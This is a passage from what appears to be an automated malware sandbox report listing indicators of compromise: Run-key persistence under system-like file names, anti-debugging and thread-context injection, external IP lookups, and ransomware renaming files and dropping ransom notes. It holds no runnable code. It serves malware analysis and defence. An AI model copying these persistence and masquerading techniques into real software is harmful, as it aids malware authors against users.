app.exe1543961.exe3377047_logo_media.exe1D10.exeaipackagechainer.exedescription ioc process Set value (str) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\rundll32 = "\"C:\\Boot\\pt-PT\\rundll32.exe\"" app.exe Set value (str) \REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000\Software\Microsoft\Windows\CurrentVersion\Run\WinHost = "C:\\Users\\Admin\\AppData\\Roaming\\WinHost\\WinHoster.exe" 1543961.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce\system recover = "\"C:\\Program Files (x86)\\Windows Defender\\Gemishecaeby.exe\"" 3377047_logo_media.exe Key created \REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000\Software\Microsoft\Windows\CurrentVersion\Run 1D10.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\explorer = "\"C:\\ProgramData\\Microsoft\\NetFramework\\BreadcrumbStore\\explorer.exe\"" app.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\dllhost = "\"C:\\Windows\\System32\\dusmapi\\dllhost.exe\"" app.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\msiexec = "\"C:\\Windows\\SysWOW64\\setupcln\\msiexec.exe\"" app.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\5504337 = "\"C:\\ProgramData\\59\\5504337.exe\"" app.exe Key created \REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000\Software\Microsoft\Windows\CurrentVersion\Run aipackagechainer.exe Set value (str) \REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000\Software\Microsoft\Windows\CurrentVersion\Run\ aipackagechainer.exe Set value (str) \REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000\Software\Microsoft\Windows\CurrentVersion\Run\taskeng.exe = "\"C:\\Users\\Admin\\AppData\\Roaming\\Microsoft\\Windows\\taskeng.exe\" -start" 1D10.exe -
Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
-
Processes:
YjGkUXS79c6Yx83LaCcitF4i.exe5UGVE6RxDwIgDLlxhN_NPoX7.exe7DEB.exe8B3A.exeA5A9.exe6B5C.exeHqeTzHZdh1KyjcFp4aA13tvd.exeZ6X45YxttCTJi5IiQ4xPeFcp.exe1D10.exeoMAHejMtAEYE1VopeG9aj0Fc.exePtyHRWTqRy0UITBsMkTArf_R.exelGWWBHm3E8UplgySvQwCR8t4.exejeEY260TDbsX9nbKMwLGA5tW.exeEBPRzFXg8T9BBzxSv1xLJFze.exeId0poKC1idN5W9bizinmQEVJ.exe725.exedescription ioc process Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA YjGkUXS79c6Yx83LaCcitF4i.exe Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA 5UGVE6RxDwIgDLlxhN_NPoX7.exe Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA 7DEB.exe Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA 8B3A.exe Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA A5A9.exe Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA 6B5C.exe Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA HqeTzHZdh1KyjcFp4aA13tvd.exe Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA Z6X45YxttCTJi5IiQ4xPeFcp.exe Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA 1D10.exe Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA oMAHejMtAEYE1VopeG9aj0Fc.exe Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA PtyHRWTqRy0UITBsMkTArf_R.exe Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA lGWWBHm3E8UplgySvQwCR8t4.exe Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA jeEY260TDbsX9nbKMwLGA5tW.exe Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA EBPRzFXg8T9BBzxSv1xLJFze.exe Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA Id0poKC1idN5W9bizinmQEVJ.exe Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA 725.exe -
Enumerates connected drives 3 TTPs 64 IoCs
Attempts to read the root path of hard drives other than the default C: drive.
Processes:
Cleaner Installation.exemsiexec.exe1213.exetaskeng.exeSetup.exeGameBoxWin64.exedescription ioc process File opened (read-only) \??\S: Cleaner Installation.exe File opened (read-only) \??\B: msiexec.exe File opened (read-only) \??\U: 1213.exe File opened (read-only) \??\U: Cleaner Installation.exe File opened (read-only) \??\A: msiexec.exe File opened (read-only) \??\T: taskeng.exe File opened (read-only) \??\R: Setup.exe File opened (read-only) \??\N: 1213.exe File opened (read-only) \??\B: Cleaner Installation.exe File opened (read-only) \??\Q: Cleaner Installation.exe File opened (read-only) \??\T: msiexec.exe File opened (read-only) \??\V: Setup.exe File opened (read-only) \??\V: 1213.exe File opened (read-only) \??\Y: 1213.exe File opened (read-only) \??\Y: taskeng.exe File opened (read-only) \??\L: Cleaner Installation.exe File opened (read-only) \??\W: Cleaner Installation.exe File opened (read-only) \??\E: msiexec.exe File opened (read-only) \??\I: msiexec.exe File opened (read-only) \??\J: msiexec.exe File opened (read-only) \??\S: GameBoxWin64.exe File opened (read-only) \??\K: msiexec.exe File opened (read-only) \??\J: GameBoxWin64.exe File opened (read-only) \??\N: GameBoxWin64.exe File opened (read-only) \??\P: 1213.exe File opened (read-only) \??\I: Cleaner Installation.exe File opened (read-only) \??\J: Cleaner Installation.exe File opened (read-only) \??\U: Setup.exe File opened (read-only) \??\X: Setup.exe File opened (read-only) \??\P: taskeng.exe File opened (read-only) \??\J: taskeng.exe File opened (read-only) \??\H: taskeng.exe File opened (read-only) \??\M: Cleaner Installation.exe File opened (read-only) \??\P: Setup.exe File opened (read-only) \??\S: Setup.exe File opened (read-only) \??\Q: GameBoxWin64.exe File opened (read-only) \??\L: 1213.exe File opened (read-only) \??\R: 1213.exe File opened (read-only) \??\T: 1213.exe File opened (read-only) \??\F: Cleaner Installation.exe File opened (read-only) \??\Q: Setup.exe File opened (read-only) \??\Q: taskeng.exe File opened (read-only) \??\A: taskeng.exe File opened (read-only) \??\M: Setup.exe File opened (read-only) \??\Y: Setup.exe File opened (read-only) \??\I: GameBoxWin64.exe File opened (read-only) \??\H: 1213.exe File opened (read-only) \??\X: taskeng.exe File opened (read-only) \??\V: taskeng.exe File opened (read-only) \??\P: Cleaner Installation.exe File opened (read-only) \??\T: Cleaner Installation.exe File opened (read-only) \??\Y: Cleaner Installation.exe File opened (read-only) \??\F: msiexec.exe File opened (read-only) \??\K: Setup.exe File opened (read-only) \??\B: GameBoxWin64.exe File opened (read-only) \??\E: 1213.exe File opened (read-only) \??\K: taskeng.exe File opened (read-only) \??\H: Cleaner Installation.exe File opened (read-only) \??\X: Cleaner Installation.exe File opened (read-only) \??\L: msiexec.exe File opened (read-only) \??\N: msiexec.exe File opened (read-only) \??\F: GameBoxWin64.exe File opened (read-only) \??\W: GameBoxWin64.exe File opened (read-only) \??\K: 1213.exe -
Legitimate hosting services abused for malware hosting/C2 1 TTPs
-
Looks up external IP address via web service 15 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
Processes:
flow ioc 213 ipinfo.io 163 ipinfo.io 433 ipinfo.io 1082 ipinfo.io 29 ipinfo.io 30 ipinfo.io 215 ipinfo.io 714 geoiptool.com 1081 ipinfo.io 430 ipinfo.io 126 ip-api.com 160 ipinfo.io 217 ipinfo.io 228 ipinfo.io 248 ipinfo.io -
Drops file in System32 directory 39 IoCs
Processes:
svchost.exeDrvInst.exesvchost.exeapp.exetapinstall.exeDrvInst.exedescription ioc process File opened for modification C:\Windows\System32\Tasks\AdvancedWindowsManager #1 svchost.exe File opened for modification C:\Windows\System32\Tasks\AdvancedWindowsManager #5 svchost.exe File opened for modification C:\Windows\System32\DriverStore\Temp\{0b6d093c-858e-6745-b43a-350e8a595532}\SET4042.tmp DrvInst.exe File opened for modification C:\Windows\System32\DriverStore\Temp\{0b6d093c-858e-6745-b43a-350e8a595532}\oemvista.inf DrvInst.exe File opened for modification C:\Windows\System32\DriverStore\FileRepository\oemvista.inf_amd64_a572b7f20c402d28\oemvista.inf DrvInst.exe File opened for modification C:\Windows\System32\Tasks\AdvancedWindowsManager #4 svchost.exe File opened for modification C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\INetCache\counters2.dat svchost.exe File opened for modification C:\Windows\System32\CatRoot2\dberr.txt DrvInst.exe File created C:\Windows\SysWOW64\dusmapi\5940a34987c99120d96dace90a3f93f329dcad63 app.exe File created C:\Windows\SysWOW64\setupcln\msiexec.exe app.exe File opened for modification C:\Windows\System32\Tasks\AdvancedWindowsManager #6 svchost.exe File created C:\Windows\System32\DriverStore\Temp\{0b6d093c-858e-6745-b43a-350e8a595532}\SET4043.tmp DrvInst.exe File opened for modification C:\Windows\System32\DriverStore\Temp\{0b6d093c-858e-6745-b43a-350e8a595532}\tap0901.cat DrvInst.exe File created C:\Windows\System32\DriverStore\drvstore.tmp DrvInst.exe File opened for modification C:\Windows\System32\Tasks\AdvancedWindowsManager #2 svchost.exe File opened for modification C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\644B8874112055B5E195ECB0E8F243A4 svchost.exe File opened for modification C:\Windows\System32\Tasks\rundll32 svchost.exe File opened for modification C:\Windows\System32\Tasks\AdvancedUpdater svchost.exe File created C:\Windows\SysWOW64\setupcln\133006b48fb54b65ec2045921283a18304e24d5a app.exe File opened for modification C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\644B8874112055B5E195ECB0E8F243A4 svchost.exe File created C:\Windows\System32\DriverStore\Temp\{0b6d093c-858e-6745-b43a-350e8a595532}\SET4054.tmp DrvInst.exe File opened for modification C:\Windows\System32\DriverStore\FileRepository\oemvista.inf_amd64_a572b7f20c402d28\tap0901.cat DrvInst.exe File opened for modification C:\Windows\System32\Tasks\AdvancedWindowsManager #3 svchost.exe File opened for modification C:\Windows\System32\Tasks\Firefox Default Browser Agent BCBF99D7B2FAFEDC svchost.exe File opened for modification C:\Windows\System32\Tasks\rnyuf.exe svchost.exe File opened for modification C:\Windows\System32\Tasks\explorer svchost.exe File opened for modification C:\Windows\System32\DriverStore\Temp\{0b6d093c-858e-6745-b43a-350e8a595532} DrvInst.exe File created C:\Windows\System32\DriverStore\FileRepository\oemvista.inf_amd64_a572b7f20c402d28\oemvista.PNF tapinstall.exe File created C:\Windows\System32\DriverStore\FileRepository\oemvista.inf_amd64_a572b7f20c402d28\oemvista.PNF DrvInst.exe File opened for modification C:\Windows\System32\Tasks\Firefox Default Browser Agent 837FCF33C5068FAC svchost.exe File created C:\Windows\SysWOW64\dusmapi\dllhost.exe app.exe File opened for modification C:\Windows\System32\DriverStore\Temp\{0b6d093c-858e-6745-b43a-350e8a595532}\SET4043.tmp DrvInst.exe File opened for modification C:\Windows\System32\DriverStore\Temp\{0b6d093c-858e-6745-b43a-350e8a595532}\tap0901.sys DrvInst.exe File opened for modification C:\Windows\System32\DriverStore\FileRepository\oemvista.inf_amd64_a572b7f20c402d28\tap0901.sys DrvInst.exe File opened for modification C:\Windows\System32\Tasks\dllhost svchost.exe File opened for modification C:\Windows\System32\Tasks\5504337 svchost.exe File created C:\Windows\System32\DriverStore\Temp\{0b6d093c-858e-6745-b43a-350e8a595532}\SET4042.tmp DrvInst.exe File opened for modification C:\Windows\System32\DriverStore\Temp\{0b6d093c-858e-6745-b43a-350e8a595532}\SET4054.tmp DrvInst.exe File opened for modification C:\Windows\System32\Tasks\msiexec svchost.exe -
Suspicious use of NtSetInformationThreadHideFromDebugger 64 IoCs
Processes:
PtyHRWTqRy0UITBsMkTArf_R.exelGWWBHm3E8UplgySvQwCR8t4.exeHqeTzHZdh1KyjcFp4aA13tvd.exeZ6X45YxttCTJi5IiQ4xPeFcp.exejeEY260TDbsX9nbKMwLGA5tW.exeYjGkUXS79c6Yx83LaCcitF4i.exeEBPRzFXg8T9BBzxSv1xLJFze.exeoMAHejMtAEYE1VopeG9aj0Fc.exeId0poKC1idN5W9bizinmQEVJ.exe5UGVE6RxDwIgDLlxhN_NPoX7.exe6B5C.exe7DEB.exe8B3A.exeA5A9.exe1F72.exemask_svc.exe725.exemask_svc.exe620C.exeapp.exedllhost.exepid process 2800 PtyHRWTqRy0UITBsMkTArf_R.exe 3460 lGWWBHm3E8UplgySvQwCR8t4.exe 1672 HqeTzHZdh1KyjcFp4aA13tvd.exe 1100 Z6X45YxttCTJi5IiQ4xPeFcp.exe 5468 jeEY260TDbsX9nbKMwLGA5tW.exe 6880 YjGkUXS79c6Yx83LaCcitF4i.exe 6952 EBPRzFXg8T9BBzxSv1xLJFze.exe 5876 oMAHejMtAEYE1VopeG9aj0Fc.exe 2332 Id0poKC1idN5W9bizinmQEVJ.exe 7128 5UGVE6RxDwIgDLlxhN_NPoX7.exe 9308 6B5C.exe 7948 7DEB.exe 8484 8B3A.exe 9760 A5A9.exe 7452 1F72.exe 10212 mask_svc.exe 9904 725.exe 9640 mask_svc.exe 6192 620C.exe 6192 620C.exe 6844 app.exe 6192 620C.exe 6192 620C.exe 6192 620C.exe 6192 620C.exe 6192 620C.exe 6192 620C.exe 6192 620C.exe 6192 620C.exe 6192 620C.exe 6192 620C.exe 6192 620C.exe 6192 620C.exe 6192 620C.exe 6192 620C.exe 6192 620C.exe 6192 620C.exe 6192 620C.exe 6192 620C.exe 6192 620C.exe 6192 620C.exe 6192 620C.exe 6192 620C.exe 6192 620C.exe 6192 620C.exe 6192 620C.exe 6192 620C.exe 6192 620C.exe 6192 620C.exe 6192 620C.exe 6192 620C.exe 6192 620C.exe 6192 620C.exe 7676 dllhost.exe 6192 620C.exe 6192 620C.exe 6192 620C.exe 6192 620C.exe 6192 620C.exe 6192 620C.exe 6192 620C.exe 6192 620C.exe 6192 620C.exe 6192 620C.exe -
Suspicious use of SetThreadContext 14 IoCs
Processes:
DXO_fwO41293rmBk4OLPHCT1.exeUQvCjtwlUUxmZrDhPkDuxaFf.exe54axPUQyoM5gSmQFRergm7g2.exesvchost.exe2vjE50Tl27JNy_7vbQ35QdX4.exesvchost.exeblor8zJ5PA17kKaIYWOn246T.exe7TGm2EkDGnsTEgWi5WBpVJen.exeGmwMhItJIZQBqlqtfRfbgY_j.exefcIqbCfo8qwscyu0kfiY8LUW.exeRUNDLL32.EXEDF29.exe27E0.execsvsieadescription pid process target process PID 3840 set thread context of 4840 3840 DXO_fwO41293rmBk4OLPHCT1.exe DXO_fwO41293rmBk4OLPHCT1.exe PID 2272 set thread context of 4860 2272 UQvCjtwlUUxmZrDhPkDuxaFf.exe UQvCjtwlUUxmZrDhPkDuxaFf.exe PID 3744 set thread context of 5048 3744 54axPUQyoM5gSmQFRergm7g2.exe 54axPUQyoM5gSmQFRergm7g2.exe PID 380 set thread context of 4688 380 svchost.exe MmdyuBaUmiqTtz3iycBqc_Ne.exe PID 3316 set thread context of 4964 3316 2vjE50Tl27JNy_7vbQ35QdX4.exe 2vjE50Tl27JNy_7vbQ35QdX4.exe PID 2604 set thread context of 380 2604 svchost.exe svchost.exe PID 6168 set thread context of 5836 6168 blor8zJ5PA17kKaIYWOn246T.exe blor8zJ5PA17kKaIYWOn246T.exe PID 5628 set thread context of 7024 5628 7TGm2EkDGnsTEgWi5WBpVJen.exe 7TGm2EkDGnsTEgWi5WBpVJen.exe PID 5816 set thread context of 3252 5816 GmwMhItJIZQBqlqtfRfbgY_j.exe GmwMhItJIZQBqlqtfRfbgY_j.exe PID 6664 set thread context of 5800 6664 fcIqbCfo8qwscyu0kfiY8LUW.exe fcIqbCfo8qwscyu0kfiY8LUW.exe PID 9256 set thread context of 9612 9256 RUNDLL32.EXE rundll32.exe PID 6688 set thread context of 6852 6688 DF29.exe DF29.exe PID 9888 set thread context of 1332 9888 27E0.exe RegAsm.exe PID 7480 set thread context of 9832 7480 csvsiea csvsiea -
Drops file in Program Files directory 64 IoCs
Processes:
taskeng.exeSetup.tmpdescription ioc process File opened for modification C:\Program Files\Microsoft Office\root\Licenses16\Outlook2019R_OEM_Perp-ppd.xrm-ms.payfast.200-7AF-841 taskeng.exe File opened for modification C:\Program Files\VideoLAN\VLC\lua\http\css\ui-lightness\jquery-ui-1.8.13.custom.css.payfast.200-7AF-841 taskeng.exe File opened for modification C:\Program Files\WindowsApps\Microsoft.MicrosoftOfficeHub_17.8010.5926.0_x64__8wekyb3d8bbwe\Office16\OfficeHubWin32.exe taskeng.exe File opened for modification C:\Program Files\WindowsApps\Microsoft.WindowsSoundRecorder_10.1702.301.0_x64__8wekyb3d8bbwe\Assets\VoiceRecorderAppList.contrast-black_scale-100.png taskeng.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\features\org.eclipse.ecf.filetransfer.feature_3.9.0.v20140827-1444\license.html.payfast.200-7AF-841 taskeng.exe File opened for modification C:\Program Files\Microsoft Office\root\Document Themes 16\Theme Colors\Median.xml.payfast.200-7AF-841 taskeng.exe File opened for modification C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_17.7906.42257.0_x64__8wekyb3d8bbwe\images\contrast-black\GenericMailLargeTile.scale-200.png taskeng.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\plug_ins\Multimedia\MPP\Flash.mpp taskeng.exe File opened for modification C:\Program Files\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\TEXTCONV\WPFT632.CNV taskeng.exe File opened for modification C:\Program Files\WindowsApps\Microsoft.BingWeather_4.18.56.0_x64__8wekyb3d8bbwe\Assets\AppTiles\WeatherIcons\30x30\195.png taskeng.exe File opened for modification C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_17.7906.42257.0_x64__8wekyb3d8bbwe\images\HxA-Exchange.scale-400.png taskeng.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\sign-services-auth\js\nls\sk-sk\!!! ALL YOUR FILES ARE ENCRYPTED !!!.TXT taskeng.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\visualvm\visualvm\update_tracking\com-sun-tools-visualvm-profiling.xml taskeng.exe File opened for modification C:\Program Files\Java\jre1.8.0_66\lib\meta-index.payfast.200-7AF-841 taskeng.exe File opened for modification C:\Program Files\WindowsApps\Microsoft.BingWeather_4.18.56.0_x64__8wekyb3d8bbwe\Assets\AppTiles\contrast-white\Weather_TileMediumSquare.scale-200.png taskeng.exe File opened for modification C:\Program Files\WindowsApps\Microsoft.SkypeApp_11.8.204.0_x64__kzf8qxf38zg5c\SkypeApp\Designs\Emoticons\small\bartlett.png taskeng.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\app\dev\nls\zh-tw\ui-strings.js.payfast.200-7AF-841 taskeng.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\desktop-connector-files-select\js\selector.js taskeng.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\exportpdfupsell-app\images\rhp_world_icon_2x.png taskeng.exe File opened for modification C:\Program Files\Microsoft Office\root\Office16\PAGESIZE\PGLBL102.XML.payfast.200-7AF-841 taskeng.exe File opened for modification C:\Program Files\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\THEMES16\SKY\SKY.INF.payfast.200-7AF-841 taskeng.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\visualvm\platform\modules\org-openide-loaders.jar.payfast.200-7AF-841 taskeng.exe File opened for modification C:\Program Files\WindowsApps\Microsoft.WindowsAlarms_10.1702.333.0_x64__8wekyb3d8bbwe\Assets\StopwatchLargeTile.contrast-white_scale-200.png taskeng.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\core\dev\nls\hu-hu\!!! ALL YOUR FILES ARE ENCRYPTED !!!.TXT taskeng.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\reviews\js\nls\sv-se\ui-strings.js.payfast.200-7AF-841 taskeng.exe File created C:\Program Files (x86)\MaskVPN\unins000.msg Setup.tmp File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\org.apache.batik.css_1.7.0.v201011041433.jar.payfast.200-7AF-841 taskeng.exe File opened for modification C:\Program Files\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\THEMES16\STUDIO\STUDIO.ELM.payfast.200-7AF-841 taskeng.exe File opened for modification C:\Program Files\VideoLAN\VLC\locale\el\LC_MESSAGES\vlc.mo.payfast.200-7AF-841 taskeng.exe File opened for modification C:\Program Files\WindowsApps\Microsoft.DesktopAppInstaller_1.0.10252.0_neutral_split.scale-100_8wekyb3d8bbwe\Assets\AppPackageLargeTile.scale-100.png taskeng.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\my-computer-select\js\nls\it-it\!!! ALL YOUR FILES ARE ENCRYPTED !!!.TXT taskeng.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\scan-files\images\themeless\Playstore\fil_get.svg.payfast.200-7AF-841 taskeng.exe File created C:\Program Files\Microsoft Office\root\Office16\sdxs\FA000000042\!!! ALL YOUR FILES ARE ENCRYPTED !!!.TXT taskeng.exe File opened for modification C:\Program Files\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\THEMES16\IRIS\THMBNAIL.PNG.payfast.200-7AF-841 taskeng.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\visualvm\platform\update_tracking\org-openide-options.xml.payfast.200-7AF-841 taskeng.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\activity-badge\js\nls\ca-es\!!! ALL YOUR FILES ARE ENCRYPTED !!!.TXT taskeng.exe File opened for modification C:\Program Files\Microsoft Office\root\Licenses16\ProPlus2019MSDNR_Retail-ul-oob.xrm-ms.payfast.200-7AF-841 taskeng.exe File opened for modification C:\Program Files\WindowsApps\Microsoft.MicrosoftSolitaireCollection_3.14.1181.0_x64__8wekyb3d8bbwe\Assets\background_gradient.png taskeng.exe File opened for modification C:\Program Files\WindowsApps\Microsoft.WindowsMaps_5.1611.10393.0_neutral_split.scale-125_8wekyb3d8bbwe\Assets\SecondaryTiles\Collections\contrast-white\SmallTile.scale-125_contrast-white.png taskeng.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\activity-badge\js\nls\ui-strings.js.payfast.200-7AF-841 taskeng.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\exportpdfupsell-app\js\nls\sv-se\!!! ALL YOUR FILES ARE ENCRYPTED !!!.TXT taskeng.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\tracked-send\js\plugins\tracked-send\js\nls\da-dk\ui-strings.js.payfast.200-7AF-841 taskeng.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\org.eclipse.core.contenttype_3.4.200.v20140207-1251.jar.payfast.200-7AF-841 taskeng.exe File opened for modification C:\Program Files\Java\jre1.8.0_66\lib\cmm\sRGB.pf.payfast.200-7AF-841 taskeng.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\unified-share\js\nls\cs-cz\ui-strings.js taskeng.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\tracked-send\images\core_icons_retina.png taskeng.exe File opened for modification C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_17.7906.42257.0_x64__8wekyb3d8bbwe\images\1937_40x40x32.png taskeng.exe File opened for modification C:\Program Files\WindowsApps\Microsoft.WindowsMaps_5.1611.10393.0_neutral_split.scale-125_8wekyb3d8bbwe\Assets\SecondaryTiles\Directions\Car\RTL\contrast-white\WideTile.scale-125.png taskeng.exe File opened for modification C:\Program Files\Microsoft Office\root\vfs\ProgramFilesX86\Microsoft Office\Office16\DCF\ExcelMessageDismissal.txt.payfast.200-7AF-841 taskeng.exe File opened for modification C:\Program Files\WindowsApps\Microsoft.MicrosoftSolitaireCollection_3.14.1181.0_x64__8wekyb3d8bbwe\Assets\Icons\freecell_menu_icon.png taskeng.exe File opened for modification C:\Program Files\WindowsApps\Microsoft.People_10.1.10531.0_x64__8wekyb3d8bbwe\Assets\contrast-white\PeopleAppList.targetsize-32.png taskeng.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\Tracker\end_review.gif.payfast.200-7AF-841 taskeng.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\activity-badge\js\nls\pl-pl\!!! ALL YOUR FILES ARE ENCRYPTED !!!.TXT taskeng.exe File opened for modification C:\Program Files\7-Zip\License.txt taskeng.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\visualvm\platform\modules\locale\org-netbeans-modules-spi-actions_ja.jar.payfast.200-7AF-841 taskeng.exe File opened for modification C:\Program Files\WindowsApps\Microsoft.NET.Native.Runtime.1.4_1.4.24201.0_x86__8wekyb3d8bbwe\AppxMetadata\CodeIntegrity.cat taskeng.exe File opened for modification C:\Program Files\WindowsApps\Microsoft.Windows.Photos_16.511.8780.0_x64__8wekyb3d8bbwe\Assets\PhotosAppList.contrast-black_targetsize-40.png taskeng.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\css\!!! ALL YOUR FILES ARE ENCRYPTED !!!.TXT taskeng.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\createpdfupsell-app\js\nls\sv-se\ui-strings.js taskeng.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\fss\img\themes\dark\adobe_sign_tag_retina.png.payfast.200-7AF-841 taskeng.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\dt.jar.payfast.200-7AF-841 taskeng.exe File opened for modification C:\Program Files\WindowsApps\DeletedAllUserPackages\Microsoft.WindowsAlarms_10.1702.333.0_neutral_split.scale-125_8wekyb3d8bbwe\Assets\StopwatchMedTile.contrast-black_scale-125.png taskeng.exe File opened for modification C:\Program Files\Microsoft Office\root\Licenses16\VisioStd2019R_OEM_Perp-ul-oob.xrm-ms taskeng.exe File opened for modification C:\Program Files\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\THEMES16\BREEZE\BREEZE.ELM.payfast.200-7AF-841 taskeng.exe -
Drops file in Windows directory 58 IoCs
Processes:
msiexec.exeDrvInst.exetapinstall.exeMicrosoftEdge.exeDrvInst.exetaskeng.exeexpand.exesvchost.exedescription ioc process File created C:\Windows\Installer\{C845414C-903C-4218-9DE7-132AB97FDF62}\logo.exe msiexec.exe File opened for modification C:\Windows\Installer\MSI5594.tmp msiexec.exe File created C:\Windows\Installer\SourceHash{B59E6947-D960-4A88-902E-F387AFD7DF1F} msiexec.exe File opened for modification C:\Windows\INF\setupapi.dev.log DrvInst.exe File created C:\Windows\Installer\f781dfe.msi msiexec.exe File opened for modification C:\Windows\Installer\MSI1C91.tmp msiexec.exe File opened for modification C:\Windows\Installer\MSI2697.tmp msiexec.exe File opened for modification C:\Windows\Installer\MSI7DB7.tmp msiexec.exe File opened for modification C:\Windows\Installer\MSI92E1.tmp msiexec.exe File created C:\Windows\Installer\inprogressinstallinfo.ipi msiexec.exe File created C:\Windows\INF\oem2.PNF DrvInst.exe File opened for modification C:\Windows\Installer\MSI1E37.tmp msiexec.exe File opened for modification C:\Windows\Installer\MSI235A.tmp msiexec.exe File opened for modification C:\Windows\Installer\MSIB6E1.tmp msiexec.exe File opened for modification C:\Windows\Installer\MSI8A52.tmp msiexec.exe File opened for modification C:\Windows\Installer\MSIA719.tmp msiexec.exe File opened for modification C:\Windows\INF\setupapi.dev.log tapinstall.exe File opened for modification C:\Windows\Debug\ESE.TXT MicrosoftEdge.exe File created C:\Windows\inf\oem2.inf DrvInst.exe File opened for modification C:\Windows\Installer\MSI9088.tmp msiexec.exe File opened for 